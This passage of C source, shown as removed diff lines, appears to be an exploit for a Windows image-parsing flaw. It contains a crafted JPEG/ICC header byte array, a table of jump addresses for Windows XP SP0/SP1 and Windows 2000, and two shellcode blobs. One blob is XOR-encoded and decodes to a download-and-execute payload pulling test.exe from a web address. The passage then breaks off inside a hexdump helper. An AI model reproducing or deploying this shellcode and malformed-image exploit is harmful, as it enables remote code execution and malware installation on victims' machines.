-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x58\x59\x5A\x20\x00\x00\x00\x00\x00\x00"
-"\xF3\x51\x00\x01\x00\x00\x00\x01\x16\xCC\x58\x59\x5A\x20\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x58\x59"
-"\x5A\x20\x00\x00\x00\x00\x00\x00\x6F\xA2\x00\x00\x38\xF5\x00\x00"
-"\x03\x90\x58\x59\x5A\x20\x00\x00\x00\x00\x00\x00\x62\x99\x00\x00"
-"\xB7\x85\x00\x00\x18\xDA\x58\x59\x5A\x20\x00\x00\x00\x00\x00\x00"
-"\x24\xA0\x00\x00\x0F\x84\x00\x00\xB6\xCF\x64\x65\x73\x63\x00\x00"
-"\x00\x00\x00\x00\x00\x16\x49\x45\x43\x20\x68\x74\x74\x70\x3A\x2F"
-"\x2F\x77\x77\x77\x2E\x69\x65\x63\x2E\x63\x68\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x16\x49\x45\x43\x20\x68\x74\x74\x70\x3A"
-"\x2F\x2F\x77\x77\x77\x2E\x69\x65\x63\x2E\x63\x68\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x65\x73\x63\x00\x00"
-"\x00\x00\x00\x00\x00\x2E\x49\x45\x43\x20\x36\x31\x39\x36\x36\x2D"
-"\x32\x2E\x31\x20\x44\x65\x66\x61\x75\x6C\x74\x20\x52\x47\x42\x20"
-"\x63\x6F\x6C\x6F\x75\x72\x20\x73\x70\x61\x63\x65\x20\x2D\x20\x73"
-"\x52\x47\x42\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x04\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x65\x66"
-"\x61\x75\x6C\x74\x20\x52\x47\x42\x20\x63\x6F\x6C\x6F\x75\x72\x20"
-"\x73\x70\x61\x63\x65\x20\x2D\x20\x73\x52\x47\x42\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x64\x65\x73\x63\x00\x00\x00\x00\x00\x00\x00\x2C\x52\x65"
-"\x66\x65\x72\x65\x6E\x63\x65\x20\x56\x69\x65\x77\x69\x6E\x67\x20"
-"\x43\x6F\x6E\x64\x69\x74\x69\x6F\x6E\x20\x69\x6E\x20\x49\x45\x43"
-"\x36\x31\x39\x36\x36\x2D\x32\x2E\x31\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x2C\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x20\x56"
-"\x69\x65\x77\x69\x6E\x67\x20\x43\x6F\x6E\x64\x69\x74\x69\x6F\x6E"
-"\x20\x69\x6E\x20\x49\x45\x43\x36\x31\x39\x36\x36\x2D\x32\x2E\x31"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x69\x65\x77\x00\x00"
-"\x00\x00\x00\x13\xA4\xFE\x00\x14\x5F\x2E\x00\x10\xCF\x14\x00\x03"
-"\xED\xCC\x00\x04\x13\x0B\x00\x03\x5C\x9E\x00\x00\x00\x01\x58\x59"
-"\x5A\x20\x00\x00\x00\x00\x00\x4C\x09\x56\x00\x50\x00\x00\x00\x57"
-"\x1F\xE7\x6D\x65\x61\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x02\x8F\x00\x00\x00\x02\x73\x69\x67\x20\x00\x00\x00\x00\x43\x52"
-"\x54\x20\x63\x75\x72\x76\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00"
-"\x00\x05\x00\x0A\x00\x0F\x00\x14\x00\x19\x00\x1E\x00\x23\x00\x28"
-"\x00\x2D\x00\x32\x00\x37\x00\x3B\x00\x40\x00\x45\x00\x4A\x00\x4F"
-"\x00\x54\x00\x59\x00\x5E\x00\x63\x00\x68\x00\x6D\x00\x72\x00\x77"
-"\x00\x7C\x00\x81\x00\x86\x00\x8B\x00\x90\x00\x95\x00\x9A\x00\x9F"
-"\x00\xA4\x00\xA9\x00\xAE\x00\xB2\x00\xB7\x00\xBC\x00\xC1\x00\xC6"
-"\x00\xCB\x00\xD0\x00\xD5\x00\xDB\x00\xE0\x00\xE5\x00\xEB\x00\xF0"
-"\x00\xF6\x00\xFB\x01\x01\x01\x07\x01\x0D\x01\x13\x01\x19\x01\x1F"
-"\x01\x25\x01\x2B\x01\x32\x01\x38\x01\x3E\x01\x45\x01\x4C\x01\x52"
-"\x01\x59\x01\x60\x01\x67\x01\x6E\x01\x75\x01\x7C\x01\x83\x01\x8B"
-"\x01\x92\x01\x9A\x01\xA1\x01\xA9\x01\xB1\x01\xB9\x01\xC1\x01\xC9"
-"\x01\xD1\x01\xD9\x01\xE1\x01\xE9\x01\xF2\x01\xFA\x02\x03\x02\x0C"
-"\x02\x14\x02\x1D\x02\x26\x02\x2F\x02\x38\x02\x41\x02\x4B\x02\x54"
-"\x02\x5D\x02\x67\x02\x71\x02\x7A\x02\x84\x02\x8E\x02\x98\x02\xA2"
-"\x02\xAC\x02\xB6\x02\xC1\x02\xCB\x02\xD5\x02\xE0\x02\xEB\x02\xF5"
-"\x03\x00\x03\x0B\x03\x16\x03\x21\x03\x2D\x03\x38\x03\x43\x03\x4F"
-"\x03\x5A\x03\x66\x03\x72\x03\x7E\x03\x8A\x03\x96\x03\xA2\x03\xAE"
-"\x03\xBA\x03\xC7\x03\xD3\x03\xE0\x03\xEC\x03\xF9\x04\x06\x04\x13"
-"\x04\x20\x04\x2D\x04\x3B\x04\x48\x04\x55\x04\x63\x04\x71\x04\x7E"
-"\x04\x8C\x04\x9A\x04\xA8\x04\xB6\x04\xC4\x04\xD3\x04\xE1\x04\xF0"
-"\x04\xFE\x05\x0D\x05\x1C\x05\x2B\x05\x3A\x05\x49\x05\x58\x05\x67"
-"\x05\x77\x05\x86\x05\x96\x05\xA6\x05\xB5\x05\xC5\x05\xD5\x05\xE5"
-"\x05\xF6\x06\x06\x06\x16\x06\x27\x06\x37\x06\x48\x06\x59\x06\x6A"
-"\x06\x7B\x06\x8C\x06\x9D\x06\xAF\x06\xC0\x06\xD1\x06\xE3\x06\xF5"
-"\x07\x07\x07\x19\x07\x2B\x07\x3D\x07\x4F\x07\x61\x07\x74\x07\x86"
-"\x07\x99\x07\xAC\x07\xBF\x07\xD2\x07\xE5\x07\xF8\x08\x0B\x08\x1F"
-"\x08\x32\x08\x46\x08\x5A\x08\x6E\x08\x82\x08\x96\x08\xAA\x08\xBE"
-"\x08\xD2\x08\xE7\x08\xFB\x09\x10\x09\x25\x09\x3A\x09\x4F\x09\x64"
-"\x09\x79\x09\x8F\x09\xA4\x09\xBA\x09\xCF\x09\xE5\x09\xFB\x0A\x11"
-"\x0A\x27\x0A\x3D\x0A\x54\x0A\x6A\x0A\x81\x0A\x98\x0A\xAE\x0A\xC5"
-"\x0A\xDC\x0A\xF3\x0B\x0B\x0B\x22\x0B\x39\x0B\x51\x0B\x69\x0B\x80"
-"\x0B\x98\x0B\xB0\x0B\xC8\x0B\xE1\x0B\xF9\x0C\x12\x0C\x2A\x0C\x43"
-"\x0C\x5C\x0C\x75\x0C\x8E\x0C\xA7\x0C\xC0\x0C\xD9\x0C\xF3\x0D\x0D"
-"\x0D\x26\x0D\x40\x0D\x5A\x0D\x74\x0D\x8E\x0D\xA9\x0D\xC3\x0D\xDE"
-"\x0D\xF8\x0E\x13\x0E\x2E\x0E\x49\x0E\x64\x0E\x7F\x0E\x9B\x0E\xB6"
-"\x0E\xD2\x0E\xEE\x0F\x09\x0F\x25\x0F\x41\x0F\x5E\x0F\x7A\x0F\x96"
-"\x0F\xB3\x0F\xCF\x0F\xEC\x10\x09\x10\x26\x10\x43\x10\x61\x10\x7E"
-"\x10\x9B\x10\xB9\x10\xD7\x10\xF5\x11\x13\x11\x31\x11\x4F\x11\x6D"
-"\x11\x8C\x11\xAA\x11\xC9\x11\xE8\x12\x07\x12\x26\x12\x45\x12\x64"
-"\x12\x84\x12\xA3\x12\xC3\x12\xE3\x13\x03\x13\x23\x13\x43\x13\x63"
-"\x13\x83\x13\xA4\x13\xC5\x13\xE5\x14\x06\x14\x27\x14\x49\x14\x6A"
-"\x14\x8B\x14\xAD\x14\xCE\x14\xF0\x15\x12\x15\x34\x15\x56\x15\x78"
-"\x15\x9B\x15\xBD\x15\xE0\x16\x03\x16\x26\x16\x49\x16\x6C\x16\x8F"
-"\x16\xB2\x16\xD6\x16\xFA\x17\x1D\x17\x41\x17\x65\x17\x89\x17\xAE"
-"\x17\xD2\x17\xF7\x18\x1B\x18\x40\x18\x65\x18\x8A\x18\xAF\x18\xD5"
-"\x18\xFA\x19\x20\x19\x45\x19\x6B\x19\x91\x19\xB7\x19\xDD\x1A\x04"
-"\x1A\x2A\x1A\x51\x1A\x77\x1A\x9E\x1A\xC5\x1A\xEC\x1B\x14\x1B\x3B"
-"\x1B\x63\x1B\x8A\x1B\xB2\x1B\xDA\x1C\x02\x1C\x2A\x1C\x52\x1C\x7B"
-"\x1C\xA3\x1C\xCC\x1C\xF5\x1D\x1E\x1D\x47\x1D\x70\x1D\x99\x1D\xC3"
-"\x1D\xEC\x1E\x16\x1E\x40\x1E\x6A\x1E\x94\x1E\xBE\x1E\xE9\x1F\x13"
-"\x1F\x3E\x1F\x69\x1F\x94\x1F\xBF\x1F\xEA\x20\x15\x20\x41\x20\x6C"
-"\x20\x98\x20\xC4\x20\xF0\x21\x1C\x21\x48\x21\x75\x21\xA1\x21\xCE"
-"\x21\xFB\x22\x27\x22\x55\x22\x82\x22\xAF\x22\xDD\x23\x0A\x23\x38"
-"\x23\x66\x23\x94\x23\xC2\x23\xF0\x24\x1F\x24\x4D\x24\x7C\x24\xAB"
-"\x24\xDA\x25\x09\x25\x38\x25\x68\x25\x97\x25\xC7\x25\xF7\x26\x27"
-"\x26\x57\x26\x87\x26\xB7\x26\xE8\x27\x18\x27\x49\x27\x7A\x27\xAB"
-"\x27\xDC\x28\x0D\x28\x3F\x28\x71\x28\xA2\x28\xD4\x29\x06\x29\x38"
-"\x29\x6B\x29\x9D\x29\xD0\x2A\x02\x2A\x35\x2A\x68\x2A\x9B\x2A\xCF"
-"\x2B\x02\x2B\x36\x2B\x69\x2B\x9D\x2B\xD1\x2C\x05\x2C\x39\x2C\x6E"
-"\x2C\xA2\x2C\xD7\x2D\x0C\x2D\x41\x2D\x76\x2D\xAB\x2D\xE1\x2E\x16"
-"\x2E\x4C\x2E\x82\x2E\xB7\x2E\xEE\x2F\x24\x2F\x5A\x2F\x91\x2F\xC7"
-"\x2F\xFE\x30\x35\x30\x6C\x30\xA4\x30\xDB\x31\x12\x31\x4A\x31\x82"
-"\x31\xBA\x31\xF2\x32\x2A\x32\x63\x32\x9B\x32\xD4\x33\x0D\x33\x46"
-"\x33\x7F\x33\xB8\x33\xF1\x34\x2B\x34\x65\x34\x9E\x34\xD8\x35\x13"
-"\x35\x4D\x35\x87\x35\xC2\x35\xFD\x36\x37\x36\x72\x36\xAE\x36\xE9"
-"\x37\x24\x37\x60\x37\x9C\x37\xD7\x38\x14\x38\x50\x38\x8C\x38\xC8"
-"\x39\x05\x39\x42\x39\x7F\x39\xBC\x39\xF9\x3A\x36\x3A\x74\x3A\xB2"
-"\x3A\xEF\x3B\x2D\x3B\x6B\x3B\xAA\x3B\xE8\x3C\x27\x3C\x65\x3C\xA4"
-"\x3C\xE3\x3D\x22\x3D\x61\x3D\xA1\x3D\xE0\x3E\x20\x3E\x60\x3E\xA0"
-"\x3E\xE0\x3F\x21\x3F\x61\x3F\xA2\x3F\xE2\x40\x23\x40\x64\x40\xA6"
-"\x40\xE7\x41\x29\x41\x6A\x41\xAC\x41\xEE\x42\x30\x42\x72\x42\xB5"
-"\x42\xF7\x43\x3A\x43\x7D\x43\xC0\x44\x03\x44\x47\x44\x8A\x44\xCE"
-"\x45\x12\x45\x55\x45\x9A\x45\xDE\x46\x22\x46\x67\x46\xAB\x46\xF0"
-"\x47\x35\x47\x7B\x47\xC0\x48\x05\x48\x4B\x48\x91\x48\xD7\x49\x1D"
-"\x49\x63\x49\xA9\x49\xF0\x4A\x37\x4A\x7D\x4A\xC4\x4B\x0C\x4B\x53"
-"\x4B\x9A\x4B\xE2\x4C\x2A\x4C\x72\x4C\xBA\x4D\x02\x4D\x4A\x4D\x93"
-"\x4D\xDC\x4E\x25\x4E\x6E\x4E\xB7\x4F\x00\x4F\x49\x4F\x93\x4F\xDD"
-"\x50\x27\x50\x71\x50\xBB\x51\x06\x51\x50\x51\x9B\x51\xE6\x52\x31"
-"\x52\x7C\x52\xC7\x53\x13\x53\x5F\x53\xAA\x53\xF6\x54\x42\x54\x8F"
-"\x54\xDB\x55\x28\x55\x75\x55\xC2\x56\x0F\x56\x5C\x56\xA9\x56\xF7"
-"\x57\x44\x57\x92\x57\xE0\x58\x2F\x58\x7D\x58\xCB\x59\x1A\x59\x69"
-"\x59\xB8\x5A\x07\x5A\x56\x5A\xA6\x5A\xF5\x5B\x45\x5B\x95\x5B\xE5"
-"\x5C\x35\x5C\x86\x5C\xD6\x5D\x27\x5D\x78\x5D\xC9\x5E\x1A\x5E\x6C"
-"\x5E\xBD\x5F\x0F\x5F\x61\x5F\xB3\x60\x05\x60\x57\x60\xAA\x60\xFC"
-"\x61\x4F\x61\xA2\x61\xF5\x62\x49\x62\x9C\x62\xF0\x63\x43\x63\x97"
-"\x63\xEB\x64\x40\x64\x94\x64\xE9\x65\x3D\x65\x92\x65\xE7\x66\x3D"
-"\x66\x92\x66\xE8\x67\x3D\x67\x93\x67\xE9\x68\x3F\x68\x96\x68\xEC"
-"\x69\x43\x69\x9A\x69\xF1\x6A\x48\x6A\x9F\x6A\xF7\x6B\x4F\x6B\xA7"
-"\x6B\xFF\x6C\x57\x6C\xAF\x6D\x08\x6D\x60\x6D\xB9\x6E\x12\x6E\x6B"
-"\x6E\xC4\x6F\x1E\x6F\x78\x6F\xD1\x70\x2B\x70\x86\x70\xE0\x71\x3A"
-"\x71\x95\x71\xF0\x72\x4B\x72\xA6\x73\x01\x73\x5D\x73\xB8\x74\x14"
-"\x74\x70\x74\xCC\x75\x28\x75\x85\x75\xE1\x76\x3E\x76\x9B\x76\xF8"
-"\x77\x56\x77\xB3\x78\x11\x78\x6E\x78\xCC\x79\x2A\x79\x89\x79\xE7"
-"\x7A\x46\x7A\xA5\x7B\x04\x7B\x63\x7B\xC2\x7C\x21\x7C\x81\x7C\xE1"
-"\x7D\x41\x7D\xA1\x7E\x01\x7E\x62\x7E\xC2\x7F\x23\x7F\x84\x7F\xE5"
-"\x80\x47\x80\xA8\x81\x0A\x81\x6B\x81\xCD\x82\x30\x82\x92\x82\xF4"
-"\x83\x57\x83\xBA\x84\x1D\x84\x80\x84\xE3\x85\x47\x85\xAB\x86\x0E"
-"\x86\x72\x86\xD7\x87\x3B\x87\x9F\x88\x04\x88\x69\x88\xCE\x89\x33"
-"\x89\x99\x89\xFE\x8A\x64\x8A\xCA\x8B\x30\x8B\x96\x8B\xFC\x8C\x63"
-"\x8C\xCA\x8D\x31\x8D\x98\x8D\xFF\x8E\x66\x8E\xCE\x8F\x36\x8F\x9E"
-"\x90\x06\x90\x6E\x90\xD6\x91\x3F\x91\xA8\x92\x11\x92\x7A\x92\xE3"
-"\x93\x4D\x93\xB6\x94\x20\x94\x8A\x94\xF4\x95\x5F\x95\xC9\x96\x34"
-"\x96\x9F\x97\x0A\x97\x75\x97\xE0\x98\x4C\x98\xB8\x99\x24\x99\x90"
-"\x99\xFC\x9A\x68\x9A\xD5\x9B\x42\x9B\xAF\x9C\x1C\x9C\x89\x9C\xF7"
-"\x9D\x64\x9D\xD2\x9E\x40\x9E\xAE\x9F\x1D\x9F\x8B\x9F\xFA\xA0\x69"
-"\xA0\xD8\xA1\x47\xA1\xB6\xA2\x26\xA2\x96\xA3\x06\xA3\x76\xA3\xE6"
-"\xA4\x56\xA4\xC7\xA5\x38\xA5\xA9\xA6\x1A\xA6\x8B\xA6\xFD\xA7\x6E"
-"\xA7\xE0\xA8\x52\xA8\xC4\xA9\x37\xA9\xA9\xAA\x1C\xAA\x8F\xAB\x02"
-"\xAB\x75\xAB\xE9\xAC\x5C\xAC\xD0\xAD\x44\xAD\xB8\xAE\x2D\xAE\xA1"
-"\xAF\x16\xAF\x8B\xB0\x00\xB0\x75\xB0\xEA\xB1\x60\xB1\xD6\xB2\x4B"
-"\xB2\xC2\xB3\x38\xB3\xAE\xB4\x25\xB4\x9C\xB5\x13\xB5\x8A\xB6\x01"
-"\xB6\x79\xB6\xF0\xB7\x68\xB7\xE0\xB8\x59\xB8\xD1\xB9\x4A\xB9\xC2"
-"\xBA\x3B\xBA\xB5\xBB\x2E\xBB\xA7\xBC\x21\xBC\x9B\xBD\x15\xBD\x8F"
-"\xBE\x0A\xBE\x84\xBE\xFF\xBF\x7A\xBF\xF5\xC0\x70\xC0\xEC\xC1\x67"
-"\xC1\xE3\xC2\x5F\xC2\xDB\xC3\x58\xC3\xD4\xC4\x51\xC4\xCE\xC5\x4B"
-"\xC5\xC8\xC6\x46\xC6\xC3\xC7\x41\xC7\xBF\xC8\x3D\xC8\xBC\xC9\x3A"
-"\xC9\xB9\xCA\x38\xCA\xB7\xCB\x36\xCB\xB6\xCC\x35\xCC\xB5\xCD\x35"
-"\xCD\xB5\xCE\x36\xCE\xB6\xCF\x37\xCF\xB8\xD0\x39\xD0\xBA\xD1\x3C"
-"\xD1\xBE\xD2\x3F\xD2\xC1\xD3\x44\xD3\xC6\xD4\x49\xD4\xCB\xD5\x4E"
-"\xD5\xD1\xD6\x55\xD6\xD8\xD7\x5C\xD7\xE0\xD8\x64\xD8\xE8\xD9\x6C"
-"\xD9\xF1\xDA\x76\xDA\xFB\xDB\x80\xDC\x05\xDC\x8A\xDD\x10\xDD\x96"
-"\xDE\x1C\xDE\xA2\xDF\x29\xDF\xAF\xE0\x36\xE0\xBD\xE1\x44\xE1\xCC"
-"\xE2\x53\xE2\xDB\xE3\x63\xE3\xEB\xE4\x73\xE4\xFC\xE5\x84\xE6\x0D"
-"\xE6\x96\xE7\x1F\xE7\xA9\xE8\x32\xE8\xBC\xE9\x46\xE9\xD0\xEA\x5B"
-"\xEA\xE5\xEB\x70\xEB\xFB\xEC\x86\xED\x11\xED\x9C\xEE\x28\xEE\xB4"
-"\xEF\x40\xEF\xCC\xF0\x58\xF0\xE5\xF1\x72\xF1\xFF\xF2\x8C\xF3\x19"
-"\xF3\xA7\xF4\x34\xF4\xC2\xF5\x50\xF5\xDE\xF6\x6D\xF6\xFB\xF7\x8A"
-"\xF8\x19\xF8\xA8\xF9\x38\xF9\xC7\xFA\x57\xFA\xE7\xFB\x77\xFC\x07"
-"\xFC\x98\xFD\x29\xFD\xBA\xFE\x4B\xFE\xDC\xFF\x6D\xFF\xFF\xFF\xFE"
-"\x00\x1F\x4C\x45\x41\x44\x20\x54\x65\x63\x68\x6E\x6F\x6C\x6F\x67"
-"\x69\x65\x73\x20\x49\x6E\x63\x2E\x20\x56\x31\x2E\x30\x31\x00\xFF"
-"\xDB\x00\x84\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x03\x03"
-"\x02\x03\x04\x07\x04\x04\x03\x03\x04\x08\x06\x06\x05\x07\x0A\x09"
-"\x0A\x0A\x0A\x09\x0A\x09\x0B\x0C\x10\x0E\x0B\x0C\x0F\x0C\x09\x0A"
-"\x0E\x13\x0E\x0F\x11\x11\x12\x12\x12\x0B\x0D\x14\x15\x14\x12\x15"
-"\x10\x12\x12\x11\x01\x03\x03\x03\x04\x03\x04\x08\x04\x04\x08\x11"
-"\x0B\x0A\x0B\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
-"\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
-"\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
-"\x11\x11\x11\x11\x11\xFF\xC4\x01\xA2\x00\x00\x01\x05\x01\x01\x01"
-"\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05"
-"\x06\x07\x08\x09\x0A\x0B\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01"
-"\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08"
-"\x09\x0A\x0B\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04"
-"\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06"
-"\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08\x23\x42\xB1\xC1"
-"\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17\x18\x19\x1A"
-"\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43\x44\x45"
-"\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65"
-"\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85"
-"\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3"
-"\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA"
-"\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8"
-"\xD9\xDA\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4"
-"\xF5\xF6\xF7\xF8\xF9\xFA\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07"
-"\x05\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31"
-"\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1"
-"\xB1\xC1\x09\x23\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1"
-"\x25\xF1\x17\x18\x19\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39"
-"\x3A\x43\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59"
-"\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79"
-"\x7A\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97"
-"\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5"
-"\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3"
-"\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA"
-"\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xC0\x00\x11\x08\x01\x20"
-"\x01\xE0\x03\x01\x11\x00\x02\x11\x01\x03\x11\x01\xFF\xDA\x00\x0C"
-"\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xFD\xFC\xA0\x02\x80\x0A"
-"\x00\x28\x00\xA0\x02\x80\x0A\x00\x28\x00\xA0\x02\x80\x0A\x00\x28";
-
-struct {
-char *os;
-long jmpADD;
-long writeable_add;
-}
-
-targets[] = {
-{ "Windows XP without SP eng/rus", 0x77E9FC79,  0x00064000 },
-{ "Windows XP SP1 eng/rus       ", 0x77E9AE59,  0x00064000 },
-{ "Windows 2000 SP0             ", 0x77f8948b,  0x00064000 },
-{ "Crash Explorer               ", 0x41424344,  0x00064000 },
-{ "Dummy (crash all)            ", 0x0,         0x00064000 },
-}, v;
-
-unsigned char shellcode[] =
-"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e"
-"\xb0\x8c\x35\x83\xeb\xfc\xe2\xf4\xa2\xda\x67\x78\xb6\x49\x73\xca"
-"\xa1\xd0\x07\x59\x7a\x94\x07\x70\x62\x3b\xf0\x30\x26\xb1\x63\xbe"
-"\x11\xa8\x07\x6a\x7e\xb1\x67\x7c\xd5\x84\x07\x34\xb0\x81\x4c\xac"
-"\xf2\x34\x4c\x41\x59\x71\x46\x38\x5f\x72\x67\xc1\x65\xe4\xa8\x1d"
-"\x2b\x55\x07\x6a\x7a\xb1\x67\x53\xd5\xbc\xc7\xbe\x01\xac\x8d\xde"
-"\x5d\x9c\x07\xbc\x32\x94\x90\x54\x9d\x81\x57\x51\xd5\xf3\xbc\xbe"
-"\x1e\xbc\x07\x45\x42\x1d\x07\x75\x56\xee\xe4\xbb\x10\xbe\x60\x65"
-"\xa1\x66\xea\x66\x38\xd8\xbf\x07\x36\xc7\xff\x07\x01\xe4\x73\xe5"
-"\x36\x7b\x61\xc9\x65\xe0\x73\xe3\x01\x39\x69\x53\xdf\x5d\x84\x37"
-"\x0b\xda\x8e\xca\x8e\xd8\x55\x3c\xab\x1d\xdb\xca\x88\xe3\xdf\x66"
-"\x0d\xe3\xcf\x66\x1d\xe3\x73\xe5\x38\xd8\x81\x33\x38\xe3\x05\xd4"
-"\xcb\xd8\x28\x2f\x2e\x77\xdb\xca\x88\xda\x9c\x64\x0b\x4f\x5c\x5d"
-"\xfa\x1d\xa2\xdc\x09\x4f\x5a\x66\x0b\x4f\x5c\x5d\xbb\xf9\x0a\x7c"
-"\x09\x4f\x5a\x65\x0a\xe4\xd9\xca\x8e\x23\xe4\xd2\x27\x76\xf5\x62"
-"\xa1\x66\xd9\xca\x8e\xd6\xe6\x51\x38\xd8\xef\x58\xd7\x55\xe6\x65"
-"\x07\x99\x40\xbc\xb9\xda\xc8\xbc\xbc\x81\x4c\xc6\xf4\x4e\xce\x18"
-"\xa0\xf2\xa0\xa6\xd3\xca\xb4\x9e\xf5\x1b\xe4\x47\xa0\x03\x9a\xca"
-"\x2b\xf4\x73\xe3\x05\xe7\xde\x64\x0f\xe1\xe6\x34\x0f\xe1\xd9\x64"
-"\xa1\x60\xe4\x98\x87\xb5\x42\x66\xa1\x66\xe6\xca\xa1\x87\x73\xe5"
-"\xd5\xe7\x70\xb6\x9a\xd4\x73\xe3\x0c\x4f\x5c\x5d\xae\x3a\x88\x6a"
-"\x0d\x4f\x5a\xca\x8e\xb0\x8c\x35";
-  
-
-char shellcod2e[]= "\xeb\x0e\x5b\x4b\x33\xc9\xb1\xf1\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
-"\xe8\xed\xff\xff\xff"
-/* 220 bytes shellcode, xor with 0xee */
-"\x07\x4a\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
-"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\xaa\xee\xee\xee"
-"\x0c\x17\x86\x81\x80\xee\xee\x86\x9b\x9c\x82\x83\xba\x11\xf8\x65"
-"\x06\x06\xc0\xee\xee\xee\x6d\x02\xce\x65\x32\x84\xce\xbd\x11\xb8"
-"\xea\x29\xea\xed\xb2\x8f\xc0\x8b\x29\xaa\xed\xea\x96\x8b\xee\xee"
-"\xdd\x2e\xbe\xbe\xbd\xb9\xbe\x11\xb8\xfe\x65\x32\xbe\xbd\x11\xb8"
-"\xe6\x11\xb8\xe2\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0\x96\xed\x1b\xb8"
-"\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b\xdd\x35\xe1\x50"
-"\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05\x1f\xd5\xf1\x9b"
-"\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65\xb0\xf2\xed\x33"
-"\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xb9\x11\x11\x11\x60\xa0"
-"\xe0\x02\x2f\x97\x0b\x56\x76\x10\x64\xe0\x90\x36\x0c\x9d\xd8\xf4"
-"\xc1\x9e\x86\x9a\x9a\x9e\xd4\xc1\xc1\xdf\xdc\xd9\xc0\xde\xc0\xde"
-"\xc0\xdf\xc1\x9a\x8b\x9d\x9a\xc0\x8b\x96\x8b\xee";
-
-
-unsigned char b[4];
-
-
-DWORD t2b(DWORD pBuf)
-{
-
-DWORD ret;
-
-*((char*)&ret + 0) = *((char*)&pBuf +3);
-*((char*)&ret + 1) = *((char*)&pBuf +2);
-*((char*)&ret + 2) = *((char*)&pBuf +1);
-*((char*)&ret + 3) = *((char*)&pBuf);
-
-return ret;
-
-}
-
-void get_bytes(long word)
-{
-b[0]=word&0xff;
-b[1]=(word>>8)& 0xff;
-b[2]=(word>>16)&0xff;
-b[3]=(word>>24)&0xff;
-}
-
-void err_exit(char *s)
-{
-printf("%s\n",s);
-exit(0);
-}
-
-
-
-void hexdump(char * pbuf,unsigned int size)
-{
-unsigned int i = 0;
-for (; i < size ; i++){
